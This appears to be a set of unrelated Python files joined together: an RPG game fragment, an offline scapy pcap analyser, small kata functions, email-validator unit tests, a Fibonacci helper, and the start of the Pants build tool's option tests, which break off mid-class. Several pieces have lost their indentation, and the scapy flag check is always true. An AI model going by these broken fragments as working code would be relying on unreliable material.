            elif 2560 <= Xp <= 5119:
                Player_Lvl = 8
            elif 5120 <= Xp <= 10239:
                Player_Lvl = 9
            elif 10240 <= Xp <= 20479:
                Player_Lvl = 10
            elif 20480 <= Xp <= 40959:
                Player_Lvl = 11
            elif 40960 <= Xp <= 81919:
                Player_Lvl = 12
            elif 81920 <= Xp <= 163839:
                Player_Lvl = 13
            elif 163840 <= Xp <= 327679:
                Player_Lvl = 14
            elif 327680 <= Xp <= 655359:
                Player_Lvl = 15
            elif 655360 <= Xp <= 1310719:
                Player_Lvl = 16
            elif 1310720 <= Xp <= 2621439:
                Player_Lvl = 17
            elif 2621440 <= Xp <= 5242879:
                Player_Lvl = 18
            elif 5242880 <= Xp <= 10485759:
                Player_Lvl = 19
            elif 10485760 <= Xp <= 20971519:
                Player_Lvl = 20
            elif 20971520 <= Xp <= 41943039:
                Player_Lvl = 21
            elif 41943040 <= Xp <= 83886079:
                Player_Lvl = 22
            elif 83886080 <= Xp <= 167772159:
                Player_Lvl = 23
            elif 167772160 <= Xp <= 335544319:
                Player_Lvl = 24
            elif 335544320 <= Xp <= 671088640:
                Player_Lvl = 25
        else:
            print("This Is Not A Valid Action, Check If You Made A Typo")
def _type_out(text, delay):
    """Print *text* one character at a time, typewriter-style."""
    for character in text:
        sys.stdout.write(character)
        sys.stdout.flush()
        time.sleep(delay)
def setup_game():
    """Collect the player's name and class, set starting stats, and start the
    main loop.

    Fixes over the original:
    - class comparisons used ``is`` against string literals (identity, not
      equality), so the stat branches could never match ``input()`` strings;
      they now use a lookup keyed by the validated, lower-cased job.
    - the stat branches assigned to ``self``, which does not exist at module
      level (NameError if ever reached); stats go on ``myPlayer`` instead.
    - the repeated character-by-character print loops are factored into the
      ``_type_out`` helper.
    """
    # Name collecting.
    _type_out("Hello What Is Your Name?\n", 0.05)
    player_name = input("> ")
    myPlayer.name = player_name
    # Job handling.
    _type_out("What Is Your Class?\n", 0.05)
    _type_out("(You Can Choose Assault, Sniper, Mage, Or Heavy)\n", 0.01)
    player_job = input("> ")
    valid_jobs = ['assault', 'sniper', 'mage', 'heavy', 'test_to_long_to_type']
    while player_job.lower() not in valid_jobs:
        player_job = input("> ")
    myPlayer.job = player_job
    print("You Are Now A " + player_job.title() + ".\n")
    # Starting stats per class: (hp, mp).
    class_stats = {
        'assault': (150, 40),
        'sniper': (75, 60),
        'mage': (100, 120),
        'heavy': (250, 20),
        'test_to_long_to_type': (999, 999),
    }
    myPlayer.hp, myPlayer.mp = class_stats[player_job.lower()]
    # Introduction.
    _type_out("Welcome, " + player_name + " The " + player_job.title() + ".\n", 0.05)
    _type_out("Welcome To 'Place Holder Name'!\n", 0.03)
    _type_out("Test1...\n", 0.03)
    _type_out("Test2...\n", 0.01)
    _type_out("Test3...\n", 0.02)
    print("_____________________")
    print("_ Game Starting Now _")
    print("_____________________")
    main_game_loop()
'''
Failed Ideas...Yay:
Possibly For Rooms?
#legal_locs = [(0, 0), (0, 1), (0, 2), (0, 3), (0, 4), (0, 5), (1, 0), (1, 1), (1, 2), (1, 3), (1, 4), (1, 5),
# (2, 0),
# (2, 1), (2, 2), (2, 3), (2, 4), (2, 5), (3, 0), (3, 1), (3, 2), (3, 3), (3, 4), (3, 5), (4, 0),
# (4, 1),
# (4, 2), (4, 3), (4, 4), (4, 5), (5, 0), (5, 1), (5, 2), (5, 3), (5, 4), (5, 5)]
elif myxpos >= legal_locs:
myxpos = myxpos - 1
elif myxpos <= legal_locs:
myxpos = myxpos + 1
elif myypos >= legal_locs:
myypos = myypos - 1
elif myypos <= legal_locs:
myypos = myypos + 1
elif myxpos >= legal_locs_x:
myxpos = myxpos - 1
elif myxpos <= legal_locs_x:
myxpos = myxpos + 1
elif myypos >= legal_locs_y:
myypos = myypos - 1
elif myypos <= legal_locs_y:
myypos = myypos + 1
________________________________________________________________________________________________________________________
Possible New Additions:
Bosses?/Xp For Bosses/Loot For Bosses
Nothing Else To See Here
________________________________________________________________________________________________________________________
TODO:
Enemies, Plus Naming Such Enemies [WIP]
Rooms aka 5x5 area for now [WIP]
Currency System And Shop []
Random Loot For Enemies []
Progressing Better Loot For Higher Enemies []
Perk System For Certain Classes []
Health System []
Picking Up Loot And Inventory []
________________________________________________________________________________________________________________________
Complete:
Saving System(For Now) [x]
Movement Between Coordinates [x]
Potion Drinking System [x]
Controls(For Now) [x]
Battle System [x]
Random Enemy Spawns [x]
Random Enemies In Random Enemy Spawns [x]
XP And Leveling System [x]
________________________________________________________________________________________________________________________
Future Possibly:
A Visual Version Of The Game
A TTS Version Of This Game
A 3 Dimensional Version Of This Game In OpenGL Or A 3D Engine
Figuring Out The Process Of Porting A Game Onto Consoles?
Random Place Holder Idea
________________________________________________________________________________________________________________________
D:\RPG Game
D:\Code.Pylet Tutorials\throwaway.py
________________________________________________________________________________________________________________________
Old System
response = input("Start A New Game Or Load A Game? (Enter load1, load2, load3, Or New): ")
while response != "load1" and response != "Load1" and response != "LOAD1" and response != "load2" \
and response != "Load2" and response != "LOAD2" and response != "load3" and response != "Load3" \
and response != "LOAD3" and response != "new":
print(response + " is invalid input")
response = input("New game Or Load game? (Choose load1, load2, load3, Or new): ")
print()
if response == "load1":
try:
f = shelve.open("save1.dat")
attributes = f["attributes"]
f.close()
Name = attributes["Name"]
Race = attributes["Race"]
Class = attributes["Class"]
Weapon = attributes["Weapon"]
Xp = attributes["Xp"]
Player_Lvl = attributes["Player_Lvl"]
Currency = attributes["Currency"]
potion = attributes["potion"]
mypos = attributes["mypos"]
print("You Are A {} Wielding A {}. Your Name Is {}.".format(Class, Weapon, Name))
print(attributes)
except:
print("Save file is corrupt or doesn't exist")
response = input("New game Or Load game? (Choose load1, load2, load3, Or new): ")
elif response == "load2":
try:
f = shelve.open("save2.dat")
attributes = f["attributes"]
f.close()
Name = attributes["Name"]
Race = attributes["Race"]
Class = attributes["Class"]
Weapon = attributes["Weapon"]
Xp = attributes["Xp"]
Player_Lvl = attributes["Player_Lvl"]
Currency = attributes["Currency"]
potion = attributes["potion"]
mypos = attributes["mypos"]
print("You Are A {} Wielding A {}. Your Name Is {}.".format(Class, Weapon, Name))
print(attributes)
except:
print("Save file is corrupt or doesn't exist")
response = "not"
elif response == "load3":
try:
f = shelve.open("save3.dat")
attributes = f["attributes"]
f.close()
Name = attributes["Name"]
Race = attributes["Race"]
Class = attributes["Class"]
Weapon = attributes["Weapon"]
Xp = attributes["Xp"]
Player_Lvl = attributes["Player_Lvl"]
Currency = attributes["Currency"]
potion = attributes["potion"]
mypos = attributes["mypos"]
print("You Are A {} Wielding A {}. Your Name Is {}.".format(Class, Weapon, Name))
print(attributes)
except:
print("Save file is corrupt or doesn't exist")
response = "new"
if response == "new":
Name = input("What is your name?")
Race = input("What is your race? (Your choices are Human, Cyborg, and Robot.): ")
Class = input("What is your class? (Your choices are Assault, Sniper, and Mage.: ")
if Race == "Robot" or Race == "robot" or Race == "ROBOT":
Race = "Robot"
elif Race == "Human" or Race == "human" or Race == "HUMAN":
Race = "Human"
elif Race == "Cyborg" or Race == "cyborg" or Race == "CYBORG":
Race = "Cyborg"
if Class == "Assault" or Class == "assault":
Weapon = "Electric Rifle"
Class = "Assault"
print("You Are A {} Wielding A {}. Your Name Is {}.".format(Class, Weapon, Name))
elif Class == "Sniper" or Class == "sniper":
Weapon = "Pulse Sniper"
Class = "Sniper"
print("You Are A {} Wielding A {}. Your Name Is {}.".format(Class, Weapon, Name))
elif Class == "Mage" or Class == "mage":
Weapon = "Staff"
Class = "Mage"
print("You Are A {} Wielding A {}. Your Name Is {}.".format(Class, Weapon, Name))
else:
print("Not A Valid Choice")
print("You Are Starting At ({})".format(mypos))
print("You Are Starting With {} Potions".format(potion))
print("Enemy {}".format(epos))
print()
________________________________________________________________________________________________________________________
To Be Fixed:
elif action == "save1" or action == "SAVE1" or action == "Save1":
f = shelve.open("save1.dat")
attributes = {"Name": Name, "Race": Race, "Class": Class, "Weapon": Weapon, "Xp": Xp,
"Player_Lvl": Player_Lvl, "Currency": Currency, "potion": potion, "mypos": mypos}
f["attributes"] = attributes
f.sync()
f.close()
print("Game saved")
break
elif action == "save2" or action == "SAVE2" or action == "Save2":
f = shelve.open("save2.dat")
attributes = {"Name": Name, "Race": Race, "Class": Class, "Weapon": Weapon, "Xp": Xp,
"Player_Lvl": Player_Lvl, "Currency": Currency, "potion": potion, "mypos": mypos}
f["attributes"] = attributes
f.sync()
f.close()
print("Game saved")
break
elif action == "save3" or action == "SAVE3" or action == "Save3":
f = shelve.open("save3.dat")
attributes = {"Name": Name, "Race": Race, "Class": Class, "Weapon": Weapon, "Xp": Xp,
"Player_Lvl": Player_Lvl, "Currency": Currency, "potion": potion, "mypos": mypos}
f["attributes"] = attributes
f.sync()
f.close()
print("Game saved")
break
________________________________________________________________________________________________________________________
def print_location():
print('\n' + '_' * (4 + len(rooms[myPlayer.location][DESCRIPTION])))
if len(rooms[myPlayer.location][ZONENAME]) >= len(rooms[myPlayer.location][DESCRIPTION]):
print('| ' + rooms[myPlayer.location][ZONENAME].upper() + ' ' * -(len(rooms[myPlayer.location][DESCRIPTION])) + '|')
print('| ' + rooms[myPlayer.location][DESCRIPTION] + '|')
elif len(rooms[myPlayer.location][ZONENAME]) <= len(rooms[myPlayer.location][DESCRIPTION]):
print('| ' + rooms[myPlayer.location][ZONENAME].upper() + ' ' * (-2 + len(rooms[myPlayer.location][DESCRIPTION])) + '|')
print('| ' + rooms[myPlayer.location][DESCRIPTION] + ' ' * -(len(rooms[myPlayer.location][ZONENAME])) + ' |')
elif len(rooms[myPlayer.location][ZONENAME]) == len(rooms[myPlayer.location][DESCRIPTION]):
print('| ' + rooms[myPlayer.location][ZONENAME].upper() + ' ' + '|')
print('| ' + rooms[myPlayer.location][DESCRIPTION] + ' ' + '|')
print('_' * (4 + len(rooms[myPlayer.location][DESCRIPTION])))
'''
title_screen()
|
import ipcalc
import netifaces
import netaddr
import socket
# import dpkt
from scapy.all import *
import scapy
from pprint import pformat
# --- Input/output files and module state (Python 2 script) -------------------
# One known-bad IP per line; loaded into `errorips` below.
ipfile=open("errorIPsIn50K.txt", "r");
errorips1=ipfile.readlines();
# icmp3=open("icmp3.txt", "wb")
# icmp11=open("icmp11.txt", "wb")
# rst=open("rstips.txt", "wb")
# Output files: matched IPs and their error tags, written at the end of the run.
ips=open('errips.txt', "wb")
errortype=open("errortypes.txt", "wb")
counter=0
# Maps source IP -> error tag ('11', 'flag', 'notcp'); filled by evalpackets().
ipsanderrrors={}
# TCP flag bit masks.
# RST=0x04
SYN=0x02
ACK=0x10
pACK=0x18   # PSH|ACK
spACK=0x20  # NOTE(review): 0x20 is the URG bit -- the name suggests something
            # else; confirm which flag was intended.
errorips=[]
for ip in errorips1:
    i=ip.rstrip()
    errorips.append(i)
# arr=[]
# arr.append('192.168.1.4
# d='2.228.45.89'
# if d in errorips:
#     print "FOUNDDDDDDDD"
def evalpackets(packet):
if packet[IP].src=='192.168.1.4':
pass
# print "."
elif packet.haslayer(ICMP):
dest=packet.getlayer(ICMP).dst
# if (packet.getlayer(ICMP).type==3) and str(dest) in errorips:
# print "TYPE 3"
# if dest in ipsanderrrors:
# pass
# else:
# ipsanderrrors[dest]='3'
if (packet.getlayer(ICMP).type==11) and str(dest) in errorips:
print "TYPE 11"
if dest in ipsanderrrors:
pass
else:
ipsanderrrors[dest]='11'
# icmp11.write(str(packet.getlayer(ICMP).dst))
elif packet.haslayer(TCP):
print "Tcp layer present"
# print "simple ip ", packet[IP].src
F=packet.getlayer(TCP).flags
if F and SYN or ACK or spACK or pACK:
"SKIPPING.........."
pass
else:
print "preflag ", F
if str(packet[IP].src) in errorips:
print "flag"
ipsanderrrors[packet.getlayer(TCP).src]='flag'
# rst.write(packet[IP].src)1
else:
"tcp missing"
if str(packet[IP].src) in errorips:
ipsanderrrors[packet[IP].src]='notcp'
# counter=counter+1
print len(ipsanderrrors)
# Replay the capture file through evalpackets; store=0 avoids keeping packets
# in memory.
sniff(offline="packetfile.pcap",prn=evalpackets,store=0)
print "Length of dict", len(ipsanderrrors)
# Write the matched IPs and their error tags line-by-line (same order).
for i in ipsanderrrors:
    ips.write(str(i)+'\n')
    errortype.write(str(ipsanderrrors[i])+'\n')
|
def count_positives_sum_negatives(arr):
    """Return [count of positive numbers, sum of negative numbers] in *arr*.

    An empty (or None) input yields an empty list; zeros count toward
    neither result.
    """
    if not arr:
        return []
    positives = sum(1 for value in arr if value > 0)
    negatives_total = sum(value for value in arr if value < 0)
    return [positives, negatives_total]
|
# Re-prompt until the entered name is purely alphabetic.
# ("Nhap vao ten" is Vietnamese for "Enter a name".)
while True:
    name = input("Nhap vao ten: ")
    # str.isalpha() already returns a bool; comparing to True was redundant.
    if name.isalpha():
        break
|
import unittest
from check_email import check_email
class Test(unittest.TestCase):
    """Validation-rule tests for check_email().

    Fix: the original defined two methods named ``test_basic_email_true``;
    the second definition silently replaced the first, so the plain
    "username@domain.com" case was never run. The second is renamed
    ``test_subdomain_email_true``.
    """
    def test_basic_email_true(self):
        # check "@"
        self.assertTrue(check_email("username@domain.com"))
    def test_subdomain_email_true(self):
        # check "."
        self.assertTrue(check_email("username@do.main.com"))
    def test_basic_email_false(self):
        # check "@"
        self.assertFalse(check_email("usernamedomain.com"))
    def test_double_email_false(self):
        # check "@"
        self.assertFalse(check_email("usernam@@edo@main.com"))
    def test_domain_true(self):
        # domain [a-z 0-9_-]
        self.assertTrue(check_email("username@do_main-007.com"))
    def test_domain_false_symbol(self):
        # domain [a-z 0-9_-]
        self.assertFalse(check_email("username@do_main:007.com"))
    def test_domain_dot_false(self):
        # domain none dot
        self.assertFalse(check_email("username@com"))
    def test_domain_false(self):
        # domain {3,256}
        self.assertFalse(check_email("username@co"))
    def test_domain_false257(self):
        # domain {3,256}
        my_email = "username@" + 'a' * 300 + ".com"
        self.assertFalse(check_email(my_email))
    def test_domain_symbol(self):
        # domain [^-]
        self.assertFalse(check_email("username@-domain_007.com"))
    def test_domain_symbol_error(self):
        # domain [^-]
        self.assertFalse(check_email("username@domain_007-.com"))
    def test_domain_symbol_error2(self):
        # domain [^-]
        self.assertFalse(check_email("username@domain_007.com-"))
    def test_domain_space(self):
        # space domain error
        self.assertFalse(check_email("username@do main.com"))
    def test_domain__dot2(self):
        # dot error
        self.assertFalse(check_email("username@domcom."))
    def test_domain__dot3(self):
        # dot error
        self.assertFalse(check_email("username@dom..com"))
    def test_domain__dot4(self):
        # dot error
        self.assertFalse(check_email("username@.domcom."))
    def test_name_error(self):
        # name {128}
        my_email = 'a' * 129 + "@domain.com"
        self.assertFalse(check_email(my_email))
    def test_name_none(self):
        # none name error
        self.assertFalse(check_email("@domain.com"))
    def test_name_space(self):
        # space name error
        self.assertFalse(check_email("a @domain.com"))
    def test_name_double_dot(self):
        # double dot error
        self.assertFalse(check_email("user..name@domain.com"))
    def test_name_double_dot2(self):
        # dot error
        self.assertFalse(check_email("username@domcom."))
    def test_name_even_quotes(self):
        # even quotes
        self.assertTrue(check_email('"us"er"name"@domain.com'))
    def test_name_odd_quotes(self):
        # odd quotes error
        self.assertFalse(check_email('us"er"name"@domain.com'))
    def test_name_odd_quotes2(self):
        # odd quotes error
        self.assertFalse(check_email('us"ername@domain.com'))
    def test_name_symbol1_check(self):
        # "!" rule
        self.assertTrue(check_email('username"!"@domain.com'))
    def test_name_symbol1_false(self):
        # "!" rule
        self.assertFalse(check_email('user!name@domain.com'))
    def test_name_symbol2_check(self):
        # "," rule
        self.assertTrue(check_email('user","name@domain.com'))
    def test_name_symbol2_false(self):
        # "," rule
        self.assertFalse(check_email('user",name@domain.com'))
    def test_name_symbol3_check(self):
        # ":" rule
        self.assertTrue(check_email('us":"ername@domain.com'))
    def test_name_symbol3_check2(self):
        # ":" rule
        self.assertFalse(check_email('us":er"name@domain.com'))
    def test_name_symbol3_false(self):
        # ":" rule
        self.assertFalse(check_email('us:ername@domain.com'))
    def test_name_uppercase_false(self):
        # Uppercase rule
        self.assertFalse(check_email('usAername@domain.com'))
if __name__ == '__main__':
unittest.main()
|
# coding=utf-8
__author__ = 'Hanzhiyun'
def fibonacci(n):
    """Return the n-th Fibonacci number (F(0) = 0, F(1) = 1).

    Iterates with two rolling values instead of materialising the whole
    sequence, so memory use is O(1) instead of O(n).

    Raises:
        ValueError: if n is negative (the original silently returned a wrong
            value via Python's negative list indexing).
    """
    if n < 0:
        raise ValueError("n must be non-negative")
    previous, current = 0, 1
    for _ in range(n):
        previous, current = current, previous + current
    return previous
|
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import json
import shlex
import unittest.mock
from contextlib import contextmanager
from enum import Enum
from functools import partial
from pathlib import Path
from textwrap import dedent
from typing import Any, Callable, Dict, cast
import pytest
import toml
import yaml
from packaging.version import Version
from pants.base.build_environment import get_buildroot
from pants.base.deprecated import CodeRemovedError, warn_or_error
from pants.base.hash_utils import CoercingEncoder
from pants.engine.fs import FileContent
from pants.option.config import Config
from pants.option.custom_types import UnsetBool, file_option, shell_str, target_option
from pants.option.errors import (
BooleanConversionError,
BooleanOptionNameWithNo,
DefaultValueType,
FromfileError,
HelpType,
ImplicitValIsNone,
InvalidKwarg,
InvalidMemberType,
MemberTypeNotAllowed,
MutuallyExclusiveOptionError,
NoOptionNames,
OptionAlreadyRegistered,
OptionNameDoubleDash,
ParseError,
)
from pants.option.global_options import GlobalOptions
from pants.option.option_types import StrOption
from pants.option.options import Options
from pants.option.options_bootstrapper import OptionsBootstrapper
from pants.option.parser import Parser
from pants.option.ranked_value import Rank, RankedValue
from pants.option.scope import GLOBAL_SCOPE, ScopeInfo
from pants.option.subsystem import Subsystem
from pants.util.contextutil import pushd, temporary_dir, temporary_file, temporary_file_path
_FAKE_CUR_VERSION = "1.0.0.dev0"
def global_scope() -> ScopeInfo:
    """Build the ScopeInfo for the global scope, backed by GlobalOptions."""
    scope_info = ScopeInfo(GLOBAL_SCOPE, GlobalOptions)
    return scope_info
def task(scope: str) -> ScopeInfo:
    """Build a goal-scope ScopeInfo for use in tests."""
    info = ScopeInfo(scope, is_goal=True)
    return info
def intermediate(scope: str) -> ScopeInfo:
    """Build a plain (non-goal) ScopeInfo for an intermediate scope."""
    info = ScopeInfo(scope)
    return info
def subsystem(scope: str) -> ScopeInfo:
    """Build a plain ScopeInfo for a subsystem scope."""
    info = ScopeInfo(scope)
    return info
def create_options(
    scopes: list[str],
    register_fn: Callable[[Options], None],
    args: list[str] | None = None,
    *,
    env: dict[str, str] | None = None,
    config: dict[str, dict[str, Any]] | None = None,
    extra_scope_infos: list[ScopeInfo] | None = None,
) -> Options:
    """Construct an Options instance for tests and run *register_fn* on it.

    *config* is serialised to an in-memory pants.toml; *args* are appended
    after the "./pants" binary name.
    """
    config_content = FileContent("pants.toml", toml.dumps(config or {}).encode())
    scope_infos = [ScopeInfo(scope) for scope in scopes]
    scope_infos.extend(extra_scope_infos or ())
    opts = Options.create(
        env=env or {},
        config=Config.load([config_content]),
        known_scope_infos=scope_infos,
        args=["./pants", *(args or ())],
    )
    register_fn(opts)
    return opts
# ----------------------------------------------------------------------------------------
# Boolean handling.
# ----------------------------------------------------------------------------------------
def register_bool_opts(opts: Options) -> None:
    """Register the boolean options exercised by the bool-handling tests below."""
    specs: list[tuple[str, dict[str, Any]]] = [
        ("--default-missing", {}),
        ("--default-true", {"default": True}),
        ("--default-false", {"default": False}),
        ("--unset", {"default": UnsetBool}),
        ("--implicit-true", {"implicit_value": True}),
        ("--implicit-false", {"implicit_value": False}),
        ("--implicit-false-default-false", {"implicit_value": False, "default": False}),
        ("--implicit-false-default-true", {"implicit_value": False, "default": True}),
    ]
    for flag, extra_kwargs in specs:
        opts.register(GLOBAL_SCOPE, flag, type=bool, **extra_kwargs)
def test_bool_explicit_values() -> None:
    """--opt=<value> must parse case-insensitive true/false spellings."""
    def register(opt: Options) -> None:
        opt.register(GLOBAL_SCOPE, "--opt", type=bool)
    for raw, expected in (("false", False), ("False", False), ("true", True), ("True", True)):
        parsed = create_options(
            [GLOBAL_SCOPE], register, [f"--opt={raw}"]
        ).for_global_scope()
        assert parsed.opt is expected
def test_bool_defaults() -> None:
    """With no args, every bool option reports its registered default."""
    opts = create_options([GLOBAL_SCOPE], register_bool_opts).for_global_scope()
    expected_defaults = {
        "default_missing": False,
        "default_true": True,
        "default_false": False,
        "unset": None,
        "implicit_true": False,
        "implicit_false": True,
        "implicit_false_default_false": False,
        "implicit_false_default_true": True,
    }
    for name, expected in expected_defaults.items():
        assert getattr(opts, name) is expected
def test_bool_args() -> None:
    """Passing each bare flag flips it to its implicit value (True unless overridden)."""
    flags = [
        "--default-missing",
        "--default-true",
        "--default-false",
        "--unset",
        "--implicit-true",
        "--implicit-false",
        "--implicit-false-default-false",
        "--implicit-false-default-true",
    ]
    opts = create_options([GLOBAL_SCOPE], register_bool_opts, flags).for_global_scope()
    expected_values = {
        "default_missing": True,
        "default_true": True,
        "default_false": True,
        "unset": True,
        "implicit_true": True,
        "implicit_false": False,
        "implicit_false_default_false": False,
        "implicit_false_default_true": False,
    }
    for name, expected in expected_values.items():
        assert getattr(opts, name) is expected
def test_bool_negate() -> None:
    """Each --no-* flag forces the option to the negation of its implicit value."""
    flags = [
        "--no-default-missing",
        "--no-default-true",
        "--no-default-false",
        "--no-unset",
        "--no-implicit-true",
        "--no-implicit-false",
        "--no-implicit-false-default-false",
        "--no-implicit-false-default-true",
    ]
    opts = create_options([GLOBAL_SCOPE], register_bool_opts, flags).for_global_scope()
    expected_values = {
        "default_missing": False,
        "default_true": False,
        "default_false": False,
        "unset": False,
        "implicit_true": False,
        "implicit_false": True,
        "implicit_false_default_false": True,
        "implicit_false_default_true": True,
    }
    for name, expected in expected_values.items():
        assert getattr(opts, name) is expected
@pytest.mark.parametrize("val", [False, True])
def test_bool_config(val: bool) -> None:
    """A config-file value overrides the registered default for every bool option
    (the `unset` option is deliberately excluded here)."""
    opt_names = (
        "default_missing",
        "default_true",
        "default_false",
        "implicit_true",
        "implicit_false",
        "implicit_false_default_false",
        "implicit_false_default_true",
    )
    opts = create_options(
        [GLOBAL_SCOPE], register_bool_opts, config={"GLOBAL": {opt: val for opt in opt_names}}
    ).for_global_scope()
    for opt in opt_names:
        assert opts[opt] is val, f"option {opt} has value {opts[opt]} but expected {val}"
@pytest.mark.parametrize("val", (11, "AlmostTrue"))
def test_bool_invalid_value(val: Any) -> None:
    """A non-boolean config value for a bool option raises BooleanConversionError."""

    def register_opt(opts: Options) -> None:
        opts.register(GLOBAL_SCOPE, "--opt", type=bool)

    with pytest.raises(BooleanConversionError):
        create_options(
            [GLOBAL_SCOPE], register_opt, config={"GLOBAL": {"opt": val}}
        ).for_global_scope()
# ----------------------------------------------------------------------------------------
# Type checks
# ----------------------------------------------------------------------------------------
@contextmanager
def no_exception():
    """Stand-in for `pytest.raises` in parametrized tests where no exception is expected."""
    yield
@pytest.mark.parametrize(
    "option_kwargs, assert_expected",
    [
        # str: a matching default passes; an int default is a type mismatch.
        (
            dict(type=str, default=""),
            no_exception(),
        ),
        (
            dict(type=str, default=42),
            pytest.raises(
                DefaultValueType, match=r"Default value int\(42\) does not match option type str\."
            ),
        ),
        # bool: both a bool literal and a parseable string are accepted as defaults.
        (
            dict(type=bool, default="True"),
            no_exception(),
        ),
        (
            dict(type=bool, default=True),
            no_exception(),
        ),
        (
            dict(type=bool, default="not a bool"),
            pytest.raises(
                BooleanConversionError, match=r'Got "not a bool"\. Expected "True" or "False"\.'
            ),
        ),
        # int: a float default is rejected.
        (
            dict(type=int, default=1.0),
            pytest.raises(
                DefaultValueType,
                match=r"Default value float\(1\.0\) does not match option type int\. \[option --opt in global scope\]\.",
            ),
        ),
        # list defaults given as strings are parsed, then each member is type-checked.
        (
            dict(type=list, member_type=int, default="[1, 2, 3]"),
            no_exception(),
        ),
        (
            dict(type=list, member_type=int, default="[1, 2.1, 3]"),
            pytest.raises(
                DefaultValueType,
                match=r"Default member value type mismatch\.\n\n Member value float\(2\.1\) does not match list option type int\.",
            ),
        ),
        (
            dict(type=list, member_type=float, default="[1.1, 2.0, 3.3]"),
            no_exception(),
        ),
        (
            dict(type=list, member_type=float, default="[1.1, 2.2, '3.3']"),
            pytest.raises(
                DefaultValueType,
                match=r"Member value str\('3\.3'\) does not match list option type float\.",
            ),
        ),
        # dict defaults must parse as a dict literal.
        (
            dict(type=dict, default="{'foo': 'bar'}"),
            no_exception(),
        ),
        (
            dict(type=dict, default="['foo', 'bar']"),
            pytest.raises(ParseError, match=r"Invalid dict value: \['foo', 'bar'\]"),
        ),
    ],
)
def test_default_value_type_assert(option_kwargs, assert_expected):
    """Registering a default whose type mismatches the option's type fails at parse time."""

    def register(opts: Options) -> None:
        opts.register(GLOBAL_SCOPE, "--opt", **option_kwargs)

    with assert_expected:
        create_options([GLOBAL_SCOPE], register).for_scope(GLOBAL_SCOPE)
# ----------------------------------------------------------------------------------------
# Deprecations.
# ----------------------------------------------------------------------------------------
def test_deprecated_options(caplog) -> None:
    """Reading a deprecated option (via flag, env, or config) logs a removal warning.

    The option's value is still honored; exactly one warning naming the option is emitted.
    Non-deprecated options must not warn.
    """

    def register(opts: Options) -> None:
        # Deprecated options in the global scope and in a subscope, plus one
        # non-deprecated control option ("--valid").
        opts.register(
            GLOBAL_SCOPE, "--old1", removal_version="999.99.9.dev0", removal_hint="Stop it."
        )
        opts.register(
            GLOBAL_SCOPE,
            "--bool1",
            type=bool,
            removal_version="999.99.9.dev0",
            removal_hint="¡Basta!",
        )
        opts.register("scope", "--valid")
        opts.register(
            "scope", "--old2", removal_version="999.99.9.dev0", removal_hint="Stop with the scope."
        )
        opts.register(
            "scope",
            "--bool2",
            type=bool,
            removal_version="999.99.9.dev0",
            removal_hint="¡Basta but scoped!",
        )

    def assert_deprecated(
        scope: str,
        opt: str,
        args: list[str],
        *,
        expected: str | bool,
        env: dict[str, str] | None = None,
        config: dict[str, dict[str, str]] | None = None,
    ) -> None:
        caplog.clear()
        # Reset the deprecation machinery's cache so each case logs its own warning.
        warn_or_error.clear()  # type: ignore[attr-defined]
        opts = create_options([GLOBAL_SCOPE, "scope"], register, args, env=env, config=config)
        assert opts.for_scope(scope)[opt] == expected
        assert len(caplog.records) == 1
        assert "is scheduled to be removed in version" in caplog.text
        assert opt in caplog.text

    # Flags, in both scoped-positional and prefixed forms.
    assert_deprecated(GLOBAL_SCOPE, "old1", ["--old1=x"], expected="x")
    assert_deprecated(GLOBAL_SCOPE, "bool1", ["--bool1"], expected=True)
    assert_deprecated(GLOBAL_SCOPE, "bool1", ["--no-bool1"], expected=False)
    assert_deprecated("scope", "old2", ["scope", "--old2=x"], expected="x")
    assert_deprecated("scope", "old2", ["--scope-old2=x"], expected="x")
    assert_deprecated("scope", "bool2", ["scope", "--bool2"], expected=True)
    assert_deprecated("scope", "bool2", ["scope", "--no-bool2"], expected=False)
    assert_deprecated("scope", "bool2", ["--scope-bool2"], expected=True)
    assert_deprecated("scope", "bool2", ["--no-scope-bool2"], expected=False)
    # Env vars.
    assert_deprecated(GLOBAL_SCOPE, "old1", [], env={"PANTS_GLOBAL_OLD1": "x"}, expected="x")
    assert_deprecated("scope", "old2", [], env={"PANTS_SCOPE_OLD2": "x"}, expected="x")
    # Config values.
    assert_deprecated(GLOBAL_SCOPE, "old1", [], config={"GLOBAL": {"old1": "x"}}, expected="x")
    assert_deprecated("scope", "old2", [], config={"scope": {"old2": "x"}}, expected="x")
    # Make sure the warnings don't come out for regular options.
    caplog.clear()
    warn_or_error.clear()  # type: ignore[attr-defined]
    assert (
        create_options([GLOBAL_SCOPE, "scope"], register, ["--scope-valid=x"])
        .for_scope("scope")
        .valid
        == "x"
    )
    assert not caplog.records
def test_deprecated_options_error() -> None:
    """Registering an option whose removal version has already passed raises immediately."""

    def register_expired(opts: Options) -> None:
        opts.register(GLOBAL_SCOPE, "--expired", removal_version="0.0.1.dev0")

    with pytest.raises(CodeRemovedError):
        create_options([GLOBAL_SCOPE], register_expired, [])
@unittest.mock.patch("pants.base.deprecated.PANTS_SEMVER", Version(_FAKE_CUR_VERSION))
def test_deprecated_options_start_version(caplog) -> None:
    """deprecation_start_version suppresses warnings until that version is reached."""

    def register(opts: Options) -> None:
        # Deprecation window has not started at the mocked current version
        # (asserted below via the absence of log records).
        opts.register(
            GLOBAL_SCOPE,
            "--delayed",
            removal_version="999.99.9.dev0",
            deprecation_start_version="500.0.0.dev0",
        )
        # Deprecation window starts exactly at the mocked current version.
        opts.register(
            GLOBAL_SCOPE,
            "--past-start",
            removal_version="999.99.9.dev0",
            deprecation_start_version=_FAKE_CUR_VERSION,
        )

    caplog.clear()
    # Not yet started: value is honored and no warning is logged.
    assert (
        create_options([GLOBAL_SCOPE], register, ["--delayed=x"]).for_global_scope().delayed == "x"
    )
    assert not caplog.records
    # Started: value is honored and exactly one warning names the option.
    assert (
        create_options([GLOBAL_SCOPE], register, ["--past-start=x"]).for_global_scope().past_start
        == "x"
    )
    assert len(caplog.records) == 1
    assert "is scheduled to be removed in version" in caplog.text
    assert "past_start" in caplog.text
def test_scope_deprecation(caplog) -> None:
    """Options set under a deprecated scope still resolve, with a warning per new scope.

    This test demonstrates that two different new scopes can deprecate the same
    old scope. I.e., it's possible to split an old scope's options among multiple new scopes.
    """

    class Subsystem1(Subsystem):
        options_scope = "new1"
        deprecated_options_scope = "deprecated"
        deprecated_options_scope_removal_version = "9999.9.9.dev0"
        foo = StrOption(default=None, help="")
        bar = StrOption(default=None, help="")
        baz = StrOption(default=None, help="")

    class Subsystem2(Subsystem):
        options_scope = "new2"
        deprecated_options_scope = "deprecated"
